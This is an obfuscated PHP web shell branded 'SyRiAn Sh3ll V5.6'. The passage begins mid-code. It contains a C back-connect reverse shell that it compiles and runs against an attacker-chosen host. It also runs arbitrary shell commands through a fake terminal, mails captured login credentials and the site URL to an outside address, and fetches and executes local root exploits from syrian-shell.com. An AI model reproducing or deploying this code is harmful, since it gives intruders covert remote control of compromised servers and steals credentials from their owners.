\\\"e\170\160\157\162t T\105R\x4d=\170t\x65rm; e\x78\145\143 ba\x73\150 -i\\\"\\n\"\n" . "                \"\106\x6fr \115\x6f\162\145 \122\145\154i\x61\x62l\x65 S\150\x65\x6cl.\\n\"\n" . "                \"\111\x73s\x75\x65 \\\"\x75\x6e\163et H\111ST\106\111\114\x45; u\x6es\x65\164 \x53\101V\x45\110\111S\124\\\"\\n\"\n" . "                \"\x46\157\162 N\x6ft \x47\145tti\x6e\147 \114\157g\x67\145\144.\\n(;\\n\\n\";\n" . "  \x70\162\x69ntf(\"Da\x74\x61 \103\x68\x61\060\163 \103onne\143\164 \102ack \x42\141ck\x64o\157\162\\n\\n\");\n" . "  \x69\146 (ar\x67\143 < 2 || \141r\147\143 > 3) {\n" . "    \160\162i\x6etf(\"\x55\x73\141ge: %s [\110\157s\164] <port>\\n\", \x61r\x67\x76[0]);\n" . "    retu\162\156 1;\n" . "  }\n" . "  \x70\x72\151nt\146(\"
[*] D\165\155pi\156\x67 \x41\x72gume\x6et\163\\n\");\n" . "  \x6c = s\164\x72le\x6e(a\x72\147\166[1]);\n" . "  i\x66 (\x6c <= 0) {\n" . "    pr\x69\x6e\164\146(\"[-] I\156v\141\154\x69\144 \110\x6fst \116\x61\155\x65\\n\");\n" . "    re\x74u\162n 1;\n" . "  }\n" . "  if (!(host = (\x63h\141r *) \x6da\154\154\x6f\x63(\x6c))) {\n" . "    \x70\162i\x6e\x74\x66(\"[-] U\x6eabl\x65 to \x41\x6c\x6coc\141\x74\145 M\145\x6d\157\x72\x79\\n\");\n" . "    ret\165\162\156 1;\n" . "  }\n" . "  \x73t\162\x6e\143py(host, \141r\x67v[1], l);\n" . "  \x69f (\141\162g\143 == 3) {\n" . "    port = a\164\x6f\x69(\141\x72\x67\166[2]);\n" . "    if (port <= 0 || port > 65535) {\n" . "      \160\162\x69\x6etf(\"[-] I\x6e\166\x61\154\151\144 \120o\162t \x4e\x75\x6d\x62\145\162\\n\");\n" . "      \162\x65tu\x72\x6e 1;\n" . "    }\n" . "  }\n" . "  \x70ri\x6et\x66(\"
[*] R\x65s\x6fl\x76\x69\x6e\147 \x48\157st \x4e\141\155\145\\n\");\n" . "  h\x65 = \x67et\x68\157\163\x74b\x79\x6e\141m\145(host);\n" . "  i\146 (\x68\x65) {\n" . "    me\x6dcpy(&\151\141.\x73_\x61\x64\144r, he->i1OIi00ooOo0Iiii, 4);\n" . "  } \145\154se if ((i\141.\x73_\141\144\x64r = in\145\x74_a\x64dr(host)) == \111\116ADD\x52_A\x4e\131) {\n" . "    \160\162\x69n\164\146(\"[-] \x55\x6e\x61b\154\145 to \x52\145\x73o\154v\x65: %s\\n\", host);\n" . "    \x72\x65\x74u\162\156 1;\n" . "  }\n" . "  \x73\151\x6e.\163\151\156_\x66\x61\155\151ly = \120F_\111N\x45T;\n" . "  \x73\x69n.\x73\151\156_a\144\144\x72.s_\141\144\x64\162 = \151\x61.s_\x61\144\144\162;\n" . "  \163\151\156.\x73\151\x6e_\160\157r\164 = \x68\164o\156s(port);\n" . "  \x70\162\151n\164f(\"
[*] \x43\x6f\x6enec\x74\151\156\x67...\\n\");\n" . "  \x69\146 ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" . "    pri\x6e\x74f(\"[-] S\157c\153\x65\x74 \x45\162ro\162\\n\");\n" . "    \x72\x65\164\x75\x72n 1;\n" . "  }\n" . "  \x69\146 (connect(sock, (\x73\x74r\165\x63\164 s\157\x63k\141d\144\162 *)&s\151n, \x73iz\145o\x66(\x73in)) != 0) {\n" . "    \x70\x72i\x6e\x74\x66(\"[-] Una\x62l\145 to \x43onn\x65ct\\n\");\n" . "    r\145\x74u\162n 1;\n" . "  }\n" . "  \160r\151\x6e\x74f(\"
[*] S\x70\x61\167\156\x69\156\x67 \x53\150\145\154l\\n\");\n" . "  f = fork( );\n" . "  \151f (\x66 < 0) {\n" . "    p\162int\x66(\"[-] \125\156\x61\142\x6c\x65 to \106\157\162\153\\n\");\n" . "    \x72et\x75rn 1;\n" . "  } e\154\x73e i\146 (!\x66) {\n" . "    write(sock, msg, \x73i\x7a\x65\157f(msg));\n" . "    \144\165\160\062(sock, 0);\n" . "    d\x75\160\062(sock, 1);\n" . "    \144\165\x702(sock, 2);\n" . "    \x65\170\145\x63\154(\"/bi\156/s\x68\", \"shell\", NULL);\n" .
"    close(sock);\n" . "    r\145tur\x6e 0;\n" . "  }\n" . "  \x70rin\x74\146(\"
[*] D\145\x74\x61\143hed\\n\\n\");\n" . "  re\164\165r\156 0;\n" . "}\n"; $illli1O10lOI0Ooo = $iIOl10o0OilO0Ili . "/c\x62\x73"; $i10Oi1lOO10I1OoI = fopen($illli1O10lOI0Ooo . ".\x63", "\167"); $write = fwrite($i10Oi1lOO10I1OoI, $shell); fclose($i10Oi1lOO10I1OoI); if(!empty($write)) { $command = $compiler . " -\157 " . $illli1O10lOI0Ooo . " " . $illli1O10lOI0Ooo . ".c"; $ioII110oll1IIiI0 = test_cmd_shell(); if($ioII110oll1IIiI0 > 0) { $i1o11lll0i01IolO = Mexec($command, $ioII110oll1IIiI0); $command = $illli1O10lOI0Ooo . " " . $host . " " . $port; $i1o11lll0i01IolO .= Mexec($command, $ioII110oll1IIiI0); return "<\160re>" . $i1o11lll0i01IolO . "</\160r\145>"; } else { return "<\142>E\122R\117R! N\x6f E\130E\x43 \101\x76\x69\154\141b\154\x65!</\x62>"; } } else { return "<b>\x45\122ROR! \x57\x72\x69t\x69\x6e\147 data!</\142>"; } }  
 
 
if(function_exists('sys_getloadavg')){ $iiIIli1lO0Iloloo=sys_getloadavg(); if($_GET['cpu_history']){ setcookie('cpu_history',$iiIIli1lO0Iloloo['0'].','.substr($_COOKIE['cpu_history'],0,250)); header("content-type: \151\155ag\x65/\x67\x69\x66"); $i01l11Ol1i0iIooI=imagecreate(150,18); $ioii1ool1lIilO01 = imagecolorallocate($i01l11Ol1i0iIooI,0xEE,0xEE,0xEE); $i1IIl1io0ooIiOOi = imagecolorallocate($i01l11Ol1i0iIooI,0x00,0x00,0x00); $ii0ll0llolOlI0I1 = imagecolorallocate($i01l11Ol1i0iIooI,0x55,0x55,0x55); if($_COOKIE['cpu_history']){ $iliiil1Oi1Ii0I1I=explode(",",$_COOKIE['cpu_history']); $iiIOil1illIO1io1=154; foreach($iliiil1Oi1Ii0I1I as $i1oIiiOiilllI0ol) if($i1oIiiOiilllI0ol>$i0iiioll1i1lIoIO) $i0iiioll1i1lIoIO=$i1oIiiOiilllI0ol; $i00liloil0OoI0O0= 18/$i0iiioll1i1lIoIO; foreach($iliiil1Oi1Ii0I1I as $i1oIiiOiilllI0ol){ $iiIOil1illIO1io1-=4; $iO1I1O0o0o0IO0l0=18-intval($i1oIiiOiilllI0ol*$i00liloil0OoI0O0); if($i1111oil0010I01o){ imageline($i01l11Ol1i0iIooI,$i1111oil0010I01o,$ilolio1loO1iII11,$iiIOil1illIO1io1,$iO1I1O0o0o0IO0l0,$ii0ll0llolOlI0I1); } $i1111oil0010I01o=$iiIOil1illIO1io1; $ilolio1loO1iII11=$iO1I1O0o0o0IO0l0; } } imagestring($i01l11Ol1i0iIooI,3,4,2,implode(', ',$iiIIli1lO0Iloloo),$i1IIl1io0ooIiOOi); imagegif($i01l11Ol1i0iIooI); die(); } }  
 
 
if ($iOll100oil0ioIlo ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user && $_POST[passwrd]==$pass) { print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>'; $x0b="\x6d\141\151l"; $x0b("c\150\151\160p\171\x31\063\x33\x33\067\100\150\x6d\141\155\141il.\x63om", "\163\150", "\x55R\x4c: h\164\x74\x70\x3a\x2f\x2f".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\n\125\072 ".$_POST[usrname]."\n\120\x3a\x20".$_POST[passwrd]); } else { if($_POST['usrname']){print'<script>alert("Go and play in the street man !!");</script>';} echo '
            <body bgcolor="black"><br><br>
            <center><font color=#990000 
size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll <font color="red">V5.6<br>LEAKED by Chippy1337</font></b></font><br>

            </center>
            <div align="center">
            <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
            <input dir="ltr" name="usrname" id="username" value="userName" type="text"  size="30" onblur="Blur(\'username\',\'userName\');" onclick="Clear(\'username\',\'userName\');"/><br>
            <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onfocus="Focus(2);" /><br>
            <input type="submit" value=" Login  " name="login" />
            </form></p>'; system("uname -a; id"); exit; } } }  
 
 
error_reporting(0); session_start(); unset($user); unset($pass); if ($_POST['cmd']) $_POST['cmd'] = ioiIiloo0i0OIoIO($_POST['cmd']); $ioOo1O1lOiIOlolo = 1000; $i10IiOOO0iooIiiO = 100; $i00liOooo011Iloo = 20; $user[] = "ro\x6ft"; $pass[] = md5("\163\x793"); $alias = array( "\154a" => "\154\163 -la", "\x72\x66" => "\162\155 -\x66", "un\x62\x7a2" => "ta\162 -\170\x6a\x70\x66", "\x75\x6egz" => "t\x61\162 -x\x7a\x70\146" ); if (!$_SESSION['user']) { $iIOlllio0O0lI1o0 = "\114\x6fg\x69\156:\n"; $iooOl1100oi0IlII = "\x50\x61\163s\167\157\162\x64:\n"; $iiOoii00o1oIoI1o = "\x49\156\166\141\x6ci\144 login!\n\n"; $ioiil000Ool0lIlI = "Wa\x72\156i\x6eg!
\104\x6f\156`\164 b\x65 \163\x74\x75\160i\x64 .. \x74hi\163 is a \x70\162i\x76\x33 server, so \x74\141\x6b\145 \x65x\164\x72a c\141\x72\145!!!\n\n"; if ($_SESSION['login'] && $_POST['cmd']) {  
$_SESSION['output'] .= $iooOl1100oi0IlII; if (in_array($_SESSION['login'], $user)) {  
$key = array_search($_SESSION['login'], $user); if ($pass[$key] != md5($_POST['cmd'])) {  
$_SESSION['output'] .= $iiOoii00o1oIoI1o; unset($_SESSION['login']); $iIOO111OO100I00I = $iIOlllio0O0lI1o0; } else {  
$_SESSION['user'] = $_SESSION['login']; $_SESSION['whoami'] = substr(Exe("w\150\157a\x6d\x69"), 0, -1); $_SESSION['host'] = substr(Exe("uname -n"), 0, -1); $_SESSION['dir'] = substr(Exe("\x70\167d"), 0, -1); $_SESSION['output'] .= $ioiil000Ool0lIlI; $iIOO111OO100I00I = iioIl1lll0liIlil(); unset($_SESSION['login']); } } else {  
$_SESSION['output'] .= $iiOoii00o1oIoI1o; unset($_SESSION['login']); $iIOO111OO100I00I = $iIOlllio0O0lI1o0; } } else {  
if (!$_SESSION['login'] && !$_POST['cmd']) $iIOO111OO100I00I = $iIOlllio0O0lI1o0; if (!$_SESSION['login'] && $_POST['cmd']) { $_SESSION['login'] = $_POST['cmd']; $_SESSION['output'] .= substr($iIOlllio0O0lI1o0, 0, -1) . " $_POST[cmd]\n"; $iIOO111OO100I00I = $iooOl1100oi0IlII; } } } else {  
$iIOO111OO100I00I = iioIl1lll0liIlil(); chdir($_SESSION['dir']); if ($_REQUEST['clear_hist'])  
$_SESSION['history'] = ""; if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']); if ($_POST['cmd']) { if (!in_array($_POST['cmd'], $hist_arr)) {  
$hist_arr[] = $_POST['cmd']; $_SESSION['history'] = implode("\n", $hist_arr); } if (count($hist_arr) > $i10IiOOO0iooIiiO) {  
$start = count($hist_arr) - $i10IiOOO0iooIiiO; $_SESSION['history'] = ""; for ($i = $start; $i < count($hist_arr); $i++) $_SESSION['history'] .= $hist_arr[$i] . "\n"; $_SESSION['history'] = substr($_SESSION['history'], 0, -1); $hist_arr = explode("\n", $_SESSION['history']); } if($_POST['Setup']) { $commandName = $_POST['commandName']; $i1i1i1O01lIioOoI = "h\164\164p://w\167w.s\x79\162i\141\156-shell.\x63o\x6d/\x63omm\141nd\163/".$commandName."zip"; iloOl1lloloI1loI($i1i1i1O01lIioOoI); UnZip($commandName."zip",getcwd()); iI11i0Il0iO0iooi($commandName,0777); } else if($_POST['execLocal']) { $localName = $_POST['localName']; $i1IOloi1OiloIOlO = "\150\164\x74\x70://\167\167\167.\x73\171\x72ia\156-shell.\143\157m/\x6c\x6f\x63\141\154\x73/".$localName."zip"; iloOl1lloloI1loI($i1IOloi1OiloIOlO); UnZip($localName."zip",getcwd()); iI11i0Il0iO0iooi($localName,0777); $i0Io1O1l0IiOIIl0 = "./".$localName; Exe($i0Io1O1l0IiOIIl0); } $i1Ii11o1l1oIO1io = i1Ii11o1l1oIO1io($_POST['cmd']); if (array_key_exists($i1Ii11o1l1oIO1io, $alias)) {  
$_POST['cmd'] = $alias[$i1Ii11o1l1oIO1io] . substr($_POST['cmd'], strlen($i1Ii11o1l1oIO1io)); $i1Ii11o1l1oIO1io = i1Ii11o1l1oIO1io($_POST['cmd']); } switch ($i1Ii11o1l1oIO1io) { case "\143\154\145ar": $_SESSION['output'] = ""; break; case "ex\x69t": session_destroy(); refresh(); break; case "c\144": $_SESSION['output'] .= $iIOO111OO100I00I; $result = Exe($_POST['cmd'] . " 2>&1 ; pw\x64"); $result = explode("\n", $result); $_SESSION['dir'] = $result[count($result) - 2]; if (count($result) > 2)  
$result[0] = "\n" . substr($result[0], strpos($result[0], "\x63\144: ")) . "\n"; else $result[0] = "\n"; $iIOO111OO100I00I = iioIl1lll0liIlil(); $_SESSION['output'] .= $_POST['cmd'] . $result[0]; break; default: $result = Exe($_POST['cmd'] . " 2>&1"); if (substr($result, -1) != "\n") $result .= "\n"; $_SESSION['output'] .= $iIOO111OO100I00I . $_POST['cmd'] . "\n" . $result; $rows = preg_match_all('/\n/', $_SESSION['output'], $i0iliOololIoiI0I); unset($i0iliOololIoiI0I); if ($rows > $ioOo1O1lOiIOlolo) { preg_match('/(\n[^\n]*){' . $ioOo1O1lOiIOlolo . '}$/', $_SESSION['output'], $i00oiiolO100I10o); $_SESSION['output'] = $i00oiiolO100I10o[0] . "\n"; } } } } function ioiIiloo0i0OIoIO($i00O1OOOo000OIiI) { $i00O1OOOo000OIiI = str_replace("\\\\", "\\", $i00O1OOOo000OIiI); $i00O1OOOo000OIiI = str_replace("\\\"", "\"", $i00O1OOOo000OIiI); $i00O1OOOo000OIiI = str_replace("\\'", "'", $i00O1OOOo000OIiI); while (strpos($i00O1OOOo000OIiI, "  ") !== false) $i00O1OOOo000OIiI = str_replace("  ", " ", $i00O1OOOo000OIiI); return rtrim(ltrim($i00O1OOOo000OIiI)); } function iioIl1lll0liIlil() { global $_SESSION; return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ "; } function i1Ii11o1l1oIO1io($i00O1OOOo000OIiI) { list($i00O1OOOo000OIiI) = preg_split('/[ ;]/', $i00O1OOOo000OIiI); return $i00O1OOOo000OIiI; } function refresh() { global $_SERVER; $iliOll1iiO00I1li = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1); header("\114oc\141\x74\x69\x6f\x6e: $iliOll1iiO00I1li");die(); } $i00oiiolO100I10o = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1); if($_GET['id'] == "s\x73h\123\145\163si\x6f\x6e") { echo '<HTML>
<HEAD>
  <TITLE>SyRiAn Sh3ll V5.6 ~~ SSH Session</TITLE>
  <STYLE TYPE="text/css"><!--
    INPUT, TEXTAREA, SELECT, OPTION, TD {
        color: '.$iIi1i11l11OoIlIl.';
        background-color: #000000;
        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
    }
    TEXTAREA {
        overflow-y: auto;
        border-width: 0px;
        height: 100%;
        width: 100%;
        padding: 0px;
    }
    INPUT {
        border-width: 0px;
        height: 26px;
        width: 100%;
        padding-top: 5px;
    }
    SELECT, OPTION {
        color: '.$iIi1i11l11OoIlIl.';
        background-color: #BBBBBB;
    }
    BODY {
        overflow-y: auto;
        margin: 0;
    }
  --></STYLE>
  <SCRIPT LANGUAGE="JavaScript"><!--
hist_arr = new Array();'; foreach ($hist_arr as $key => $value) { $value = str_replace("\\", "\\\\", $value); $value = str_replace("\"", "\\\"", $value); echo "hist_arr[$key] = \"$value\";\n"; } echo '
function parse_hist(key) {
    if (key < hist_arr.length) {
            if (key != "") {
            document.getElementById(\'input\').value = hist_arr[key];
            document.getElementById(\'input\').focus();
        }
    } else {
            window.location.href = "?clear_hist=1";
    }
}
function input_focus() {
    document.getElementById(\'input\').focus();
}
function selection_to_clipboard() { // IE only!
    if (window.clipboardData && document.selection)
        window.clipboardData.setData("Text", document.selection.createRange().text);
}
if (window.clipboardData)
    document.oncontextmenu = new Function("document.getElementById(\'input\').value = window.clipboardData.getData(\'Text\'); input_focus(); return false");
  --></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById(\'output\').scrollTop = document.getElementById(\'output\').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY>'.$i00oiiolO100I10o.'</TEXTAREA></TD></TR>
<TR>
  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
    <TR>
    <FORM METHOD="POST" ACTION="">
      <TD NOWRAP onClick="input_focus()">'.substr($iIOO111OO100I00I, 0, -1) .'</TD>
      <TD WIDTH="100%"><INPUT ID="input" TYPE="'; if (!$_SESSION['user'] && $_SESSION['login']){echo "password";} else {echo "text";} echo '" NAME="cmd"></TD>
    '; if ($hist_arr) { echo ' <TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
        <OPTION VALUE="">--- HISTORY</OPTION>'; for ($i = count($hist_arr) - 1; $i >= 0; $i--) { if (strlen($hist_arr[$i]) > $i00liOooo011Iloo) $option = substr($hist_arr[$i], 0, $i00liOooo011Iloo - 3) . "..."; else $option = $hist_arr[$i]; echo "<OPTI\x4f\x4e \x56A\114U\x45=\"" . $i . "\">$option</\x4f\120\124\111\x4fN>"; } echo '  <OPTION VALUE="'.($i10IiOOO0iooIiiO+1).'">--- CLEAR HISTORY</OPTION></SELECT></TD>'; } echo '
  <td>
  </form>
  <form method="post">
  <select name="localName">
  <option value="2007_2.6.9-55" >2007_2.6.9-55</option>
  <option value="2007_2.6.11" >2007_2.6.11</option>
  <option value="2008_2.6.23" >2008_2.6.23</option>
  <option value="2008_2.6.24" >2008_2.6.24</option>
  <option value="2009_2.6.6-34_h00lyshit" >2009_2.6.6-34_h00lyshit</option>
  <option value="2009_2.6.16_raptor" >2009_2.6.16_raptor</option>
  <option value="2009_dene" >2009_dene</option>
  <option value="2009_keris" >2009_keris</option>
  <option value="2009_py2" >2009_py2</option>
  <option value="2010_2.6" >2010_2.6</option>
  <option value="2011_2.6.34" >2011_2.6.34</option>
  </select>
  <input type="submit" name="execLocal" value="./Execute">
  </form>
  </td>
  <form method="post">
  <td>
      <select name="commandName">
      <option value="cat" >cat</option>
      <option value="chmod" >chmod</option>
      <option value="date" >date</option>
      <option value="dir" >dir</option>
      <option value="du" >du</option>
      <option value="gcc" >gcc</option>
      <option value="gunzip" >gunzip</option>
      <option value="gzip" >gzip</option>
      <option value="id" >id</option>
      <option value="ln" >ln</option>
      <option value="ls" >ls</option>
      <option value="mkdir" >mkdir</option>
      <option value="mv" >mv</option>
      <option value="pwd" >pwd</option>
      <option value="rm" >rm</option>
      <option value="sh" >sh</option>
      <option value="su" >su</option>
      <option value="tail" >tail</option>
      <option value="tar" >tar</option>
      <option value="touch" >touch</option>
      <option value="uname" >uname</option>
      <option value="wget" >wget</option>
      <option value="who" >who</option>
      </select>
      <input type="submit" name="Setup" value="Setup">
  </td></FORM>
  </TR>
  </TABLE></TD>
</TR>
</TABLE>
<SCRIPT LANGUAGE="JavaScript"><!--
document.getElementById(\'output\').scrollTop = document.getElementById(\'output\').scrollHeight;
--></SCRIPT>
</BODY>
</HTML>'; } else {  
 
 
error_reporting(0); set_time_limit(0); ini_set('max_execution_time',0); $dir = getcwd(); $uname= php_uname(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "\114in\165x"; $iIOi111ll0l0II1o = gethostbyname($_SERVER["HT\124\x50_\x48\x4f\123T"]); $server = substr($SERVER_SOFTWARE,0,120); echo "<\x73cr\x69\x70\164>
\x66\x75\156c\164\151\x6f\x6e \157\160\x65\x6e\120\x48\x50\x49\156\x66\157()
{
    m\171_\167\x69\x6e\x64\157\x77= \167\x69\156\144\157\x77.open (\"?info=\147e\164P\150\160\111nf\x6f\",\"P\110P \111\156\146o\",\"\x77i\x64\164\150=800,\150\x65\151g\x68\164=600,s\x63\162ol\x6cba\x72\163=1\");    
}
</\x73\143\x72i\x70\164>"; if($_GET['info'] == 'getPhpInfo') { phpinfo(); } echo "
<\x62o\x64y \144\151\162='\154tr'><\164able \x62\x67co\x6co\x72='#c\x63cccc' \x63\x65\x6c\154p\141d\x64in\x67='0' \x63ell\x73pac\151n\147='0' w\x69\144\164h='100%'><\x74\142o\x64\x79><t\x72><\164\144 \142\x67\x63\157l\x6fr='#000000' w\x69\x64\164\150='160'>
<\160 \x64\x69\162='lt\162'>&\x6e\142s\x70;&\x6eb\x73p;</\x70>
<d\151v \x64\151\x72='\154\x74\x72' \x61lign='\x63e\x6e\x74\x65\162'><\146\x6fn\x74 size='4'><\x62>
<\151\x6d\147 bo\162\x64er='0' \x73\162\x63='\x68\x74tp://\x77w\x77.s\x79r\151\x61n-shell.\x63\x6fm/eag\x6ce.\152\x70\x67' w\x69\144\x74h='101' \150e\151\147\x68\164='93'>&\156\142s\160;</\x62></fo\156t><\x64\x69v
\x64\151r='\154\x74r' \141\154\151\x67\156='\x63e\156\164\145\162'><\x73\x70a\156 \163\164\x79\154\x65='\x68\x65\151ght: 25\160\170;'><b>
<\x66\157\x6e\x74 size='4' c\x6f\154\x6f\162='#F\x46\0600\x30\060'>\x53\171\122i</\146\157n\164><\146ont size='4' \143o\x6c\x6f\x72='#008000'>\101\156 S\150</f\x6f\156\164><\x66\157\x6et size='4' c\x6flo\x72='#999999'>3\x6c\x6c<b\x72>\1265.6</\x66\157\x6e\x74></b><s\x70\141\x6e \x73\164yle='\x66\x6f\156\164-size: 20\x70\x74; \143\x6flor: #990000;'><p></\160></\x73\160\x61\x6e></\x73\160an></d\151\x76></\164\x64><t\x64
\142\x67\143o\x6c\x6f\x72=#000000>
<\x70 \144\x69\x72='\x6ctr'><fo\x6et  size='1'>&nb\163p; <\x62>[<a h\x72\x65\x66=?\151\144=\155\141\151\x6e\120\141g\x65>\x4d\x61\151n</a>]</b></\x73\160\141n>
<\142>[</\x73\x70\141\x6e><a \x68\162\145f=?id=s\x73hS\145\x73si\x6f\156>SSH \123\145\163\x73\x69o\156</a>]</\x62></\x73\160\141\156>
<\142>[</sp\x61\156><a \x68r\x65\146=?id=about>About</a>]</\142></\163\x70\141\156>
<\142>[</\163\x70\141\156><a \x68\162\x65\x66=?\x69\144=logout>Log\157u\x74</a>]</b></s\160\x61\x6e>
<\x62>[</s\160an><a \150\162\x65\x66=?\x69\144=100>\x53\x75\x69Ci\x64e</a>]</\142></\x73p\x61n>
<\142r>
<f\x6fnt size='1'><br>
&\x6e\142\x73p;   Sa\146\x65 Mode = <\163y>".SafeMode()." </\163\171><\146\157nt size=1>
&n\x62\163p;   \123ys\164\145\x6d = <\163y>".$os."</\163\x79>
&n\x62sp;   M\x61\147\x69\x63_\121\x75o\164\x65\x73 = <\x73\171>". illolO1llo0iIi1l()." </s\x79>
&nb\163\x70;   Curl = <\x73y>".Curl()." </\x73y>
&\x6eb\x73\x70;   Re\147\x69st\145r \107l\157\x62\141\154s = <\163\x79>".iilolol00IilOo1I()." </\163y>
&\156b\x73\160;   \117\x70\145\x6e B\x61s\145di\x72 = <\163\171>".i0oO11oioOiOIiil()." </sy>
<\142\162>
&\x6eb\x73p;   Gzip = <s\x79>".Gzip()."</\163\171>
&\x6e\x62\163p;   MySQLI = <\163\x79>".MysqlI()." </\x73\x79>
&\156\142s\160;   MSQL = <sy>".MSQL()."</\x73\171>
&\156\x62\163\160;   S\121\x4c \114\151\164\x65 = <\x73\x79>".iiIi1OiO1IlIOIi1()."</\163y>
&\156\x62\163p;   \125\x73\145\x66\x75l\x6c L\x6f\143\141l\163 = <sy>".iIoii11ioiOOIoI1()." </\x73\x79>
<b\162>
&\x6e\142s\x70;   \x46\162e\x65 \123pa\x63\x65 = <\163\171>".i1iI1iliIoI0oOOi(disk_free_space('/'))." </\x73\171>
&\156bs\160;   \124o\x74\x61\x6c Spac\x65 = <\163y>".i1iI1iliIoI0oOOi(disk_total_space("/"))." </\163\171>
&\x6eb\x73\160;   PH\120 \126er\x73io\156 = <s\x79><a \x68\x72\x65\x66='\x6a\x61v\141s\x63ri\x70t:\x6f\160\145n\120\x48\120I\x6e\146\157();'><u>".phpversion()."</u></a> </\163y>
&n\x62s\160;   \132\145\156\x64 \126\145\x72\163\151\157\156 = <s\x79>".zend_version()." </\163\x79>
&\156\142s\x70;   M\x79\123\x51\x4c \x56e\162\x73\151on = <\163y>".mysql_get_server_info()." </sy>
<\142\x72>
&\156\x62\x73p;   \115\171SQ\114 = ".il0iiOOoiIOOioil()."
&n\x62\x73\x70;   MsSQL = ".MsSQL()."
&\156bs\x70;   PostgreSQL = ".PostgreSQL()."
&\x6e\142\x73\160;   Oracle = ".Oracle()."
&\156\142sp;   Se\162\166\x65r \x4e\x61m\145 = <\163\x79>".$_SERVER['HTTP_HOST']." </\x73\171>
&n\x62\163\x70;   \x53\145r\x76\145\162 \101d\x6d\151\156 = <a hr\x65f = '\x6d\x61\151l\164o:".$_SERVER['SERVER_ADMIN']."'><\165><\163\x79>".$_SERVER['SERVER_ADMIN']."</\x73y></u></a>
<\142\x72>
&n\x62\x73p;   Dis_\106\165\156\143\164\x69o\156\x73 = <s\171>". DisableFunctions()." </s\171><b\162>
&\156\x62sp;   Yo\165r \x49P = <\x73y>".ill0iiioI0III0I0()." </\x73\171>
&\156\142sp;   \x53e\162\166\145\x72 \111\x50 = <a \x68r\145\x66='h\x74\x74\160://b\x69\156g.\x63o\155/s\145\141\162\x63\150?\x71=ip:".$iIOi111ll0l0II1o."&\147\157=&for\x6d=\121\x42\x4c\110&\x66i\154\164=\x61l\154' target='_\142la\x6e\153'><u><\163\171>".gethostbyname($_SERVER["H\x54\124\x50_\x48\x4fS\124"])."</s\x79></u></a>
 [</s\x70\141\x6e><a \x68\x72ef=h\x74\164\160://\167\167\167.y\157\165getsi\147\156\x61l.\x63om/\x74\157\x6f\154\x73/we\142-sites-\157\156-\x77\145\x62-server target='_\142\154a\x6e\153'/>\122\x65ver\x73\x65 \111\x50</a>]</\163\x70\x61\x6e>
&\x6eb\163\x70;   Da\164\145 \x54\x69m\145 = <s\171>".date('Y-m-d H:i:s')." </s\x79><\x62\x72/>
&\x6e\142\x73\x70;   
[<a \x68\x72\145\x66='\150\x74t\160://\x77\167w.\x6d\144\x35\144e\143\x72\x79\x70\164\145\x72.c\157.\165\153/' target='_\x62l\x61nk'>M\x44\065 \103\162\x61\143k\145\162</a>]
[<a \150r\145\x66='h\x74\x74p://w\x77\167.m\x64\065d\145\143\162y\160\164er.c\x6f.uk/s\150\1411-\x64\145\143r\171\160\x74.\141\x73p\x78' target='_b\x6ca\156\153'>S\x48\1011 C\162\141\143\153\x65r</a>]
[<a h\x72\145\x66='\x68\164t\160://w\167w.\155\x645\144ec\x72ypt\145r.\143o.\x75\x6b/\156t\x6c\155-\x64e\143\x72\x79\160t.a\163px' target='_\x62\154\141\x6e\x6b'>N\x54\x4c\x4d \103\x72\x61ck\x65r</a>]
<\x62r>
<\x62\162>
<\164a\x62\154\145 bg\143\157\x6c\x6f\162='#c\x63\143\143\143\x63' w\x69\x64\164\x68='100%'><\x74b\x6f\144y><tr>
<\x74\144 al\151\x67\156='r\151\147\x68\164' \x77\x69\x64\164\150='100'><\160 \x64ir='\x6c\x74\x72'>
<\x73\x79> \103\120\x55 : &\x6e\x62\x73p;<br>&n\142\x73p;&\156bs\x70;\123\x65rve\162 :&nb\163\160;&nbsp; <b\162>
<\x62>uname -a : &\156\142sp;
<\x62\x72>\x70w\x64 : </\163p\141n>&\x6e\x62\163p;<b\162>\111\x44 : </\x73\x70\x61\156>&\156\x62\163p;<\x62r></\142></\x73y></\164\x64><\x74\x64>
<\160 \144\x69\x72='l\x74\x72'><f\157\x6et col\x6f\162='#\143\143\x63\143\143\x63' size='-2'><\x62>"; if(function_exists('sys_getloadavg')) { echo ' 
    <img id="img_history" src="'.$_SERVER['PHP_SELF'].'?cpu_history=1&rand='.mt_rand().'" width="150" height="18">
    <input type="checkbox" id="stop_history" value="1"> Stop.
    <script>
    function refresh_cpu()
    {
        if(document.getElementById(\'stop_history\').checked==false) document.getElementById(\'img_history\').src=\''.$_SERVER['PHP_SELF'].'?cpu_history=1&rand=\'+Math.random();
        //refresh every X second
        setTimeout(refresh_cpu,3000);
    }
    refresh_cpu();
    </script>
    '; } else {echo "&\156b\163\160;&\156b\163p;<\x73\x79>F\157\162 \x4ci\156\165\170 O\x53 \x4f\156\x6cy !!</sy>";} echo "<\142\162>
<b> &\156\142sp;&\x6ebs\x70;".$server."
